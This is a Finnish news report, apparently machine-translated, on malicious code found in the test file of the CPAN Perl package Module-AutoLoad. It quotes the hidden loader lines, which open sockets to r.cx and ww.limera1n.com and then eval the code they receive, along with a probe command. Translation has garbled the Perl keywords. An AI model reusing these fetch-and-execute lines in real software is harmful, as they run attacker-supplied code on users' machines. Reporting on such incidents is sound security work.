Haitallinen koodi havaittu Module-AutoLoad Perl -paketissa

Perl-paketissa, joka jaetaan CPAN-hakemiston kautta Moduuli-AutoLoad, suunniteltu lataamaan CPAN-moduuleja automaattisesti lennossa, tunnistettu vahingoittava koodi. Haitallinen lisäys oli löytyi testikoodissa 05_rcx.t, jota on toimitettu vuodesta 2011 lähtien.
On huomionarvoista, että kyseenalaisen koodin lataamisesta heräsi kysymyksiä Stackoverflow jo vuonna 2016.

Haitallinen toiminta tiivistyy yritykseen ladata ja suorittaa koodia kolmannen osapuolen palvelimelta (http://r.cx:1/) moduulin asennuksen yhteydessä käynnistetyn testipaketin suorittamisen aikana. Oletetaan, että alun perin ulkoiselta palvelimelta ladattu koodi ei ollut haitallinen, mutta nyt pyyntö ohjataan ww.limera1n.com-verkkotunnukseen, joka tarjoaa oman osan koodista suoritettaviksi.

Latauksen järjestäminen tiedostoon 05_rcx.t Käytetään seuraavaa koodia:

minun $ohjelma = __TIEDOSTO__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
my $try = `$^X $prog`;

Määritetty koodi suorittaa skriptin ../contrib/RCX.pl, jonka sisältö on supistettu riville:

käytä lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1″};

Tämä skripti latautuu hämmentynyt käyttämällä palvelua perlobfuscator.com koodi ulkoisesta isännästä r.cx (merkkikoodit 82.46.99.88 vastaavat tekstiä "R.cX") ja suorittaa sen eval-lohkossa.

$ perl -MIO::Socket -e'$b=uusi IO::Socket::INET 82.46.99.88.":1"; tulosta <$b>;'
eval unpack u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}

Pakkauksen purkamisen jälkeen suoritetaan lopulta seuraava: koodi:

print{$b=new IO::Socket::INET"ww.limera1n.com:80″}"GET /iJailBreak
";evalor return warn$@while$b;1

Ongelmallinen paketti on nyt poistettu arkistosta. PAUSE (Perl Authors Upload Server) ja moduulin tekijän tili on estetty. Tässä tapauksessa moduuli on edelleen jäljellä saatavilla MetaCPAN-arkistossa ja voidaan asentaa suoraan MetaCPANista käyttämällä joitain apuohjelmia, kuten cpanminus. On huomattavaettä pakettia ei jaettu laajasti.

Mielenkiintoista keskustella yhdistetty ja moduulin kirjoittaja, joka kiisti tiedon, että haitallista koodia olisi lisätty sen jälkeen, kun hänen sivustonsa "r.cx" oli hakkeroitu, ja selitti, että hänellä oli vain hauskaa, ja käytti perlobfuscator.com-sivustoa piilottaakseen jotain, vaan pienentääkseen kokoa. koodin ja yksinkertaistaa sen kopiointia leikepöydän kautta. Toiminnon nimen "botstrap" valinta selittyy sillä, että tämä sana "kuulostaa botilta ja on lyhyempi kuin bootstrap". Moduulin kirjoittaja vakuutti myös, että tunnistetut manipulaatiot eivät suorita haitallisia toimia, vaan vain osoittavat koodin lataamisen ja suorittamisen TCP:n kautta.

Lähde: opennet.ru